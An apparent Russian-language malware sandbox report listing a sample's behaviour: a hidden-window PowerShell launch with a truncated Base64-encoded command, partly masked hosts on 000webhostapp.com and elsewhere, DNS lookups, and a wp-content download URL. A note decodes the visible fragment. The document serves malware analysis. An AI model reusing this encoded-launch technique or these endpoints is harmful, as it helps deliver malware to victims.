Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAQQB2AGMAYwBpAGYAbQBoACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEEAcwBhAGYAZgB0AHgAawB1AG0AIAAjAD4AIAAkAEYAZQBmAHMAYwB3AHIAaQB6AHYAZgA9ACcAUAB0AGEAZwBoA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1592
- %TEMP%\852295.cvr
- 'en###mgdk.com':80
- 'en###mgdk.com':443
- 'si#######sine.000webhostapp.com':443
- 'ej########antonio.000webhostapp.com':443
- 'ed#.#izino.com':443
- http://www.en###mgdk.com/wp-content/jz9j7hptcw-bgwvnoaacn-64826306/
- 'en###mgdk.com':443
- 'si#######sine.000webhostapp.com':443
- 'ej########antonio.000webhostapp.com':443
- 'ed#.#izino.com':443
- DNS ASK en###mgdk.com
- DNS ASK ne#.###mmunityre.com
- DNS ASK si#######sine.000webhostapp.com
- DNS ASK ej########antonio.000webhostapp.com
- DNS ASK ed#.#izino.com
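- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAQQB2AGMAYwBpAGYAbQBoACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEEAcwBhAGYAZgB0AHgAawB1AG0AIAAjAD4AIAAkAEYAZQBmAHMAYwB3AHIAaQB6AHYAZgA9ACcAUAB0AGEAZwBoA...' (со скрытым окном)
  Примечание: -en — сокращённая форма параметра -EncodedCommand; аргумент — команда PowerShell, закодированная в Base64 (UTF-16LE), на странице она обрезана («...»). Видимая часть декодируется в «<# Avccifmh https://www.microsoft.com/Asafftxkum #> $Fefscwrizvf='Ptagh»: адрес www.microsoft.com стоит внутри блочного комментария <# ... #> и, судя по видимой части, не исполняется, поэтому его не следует относить к сетевым индикаторам этого образца.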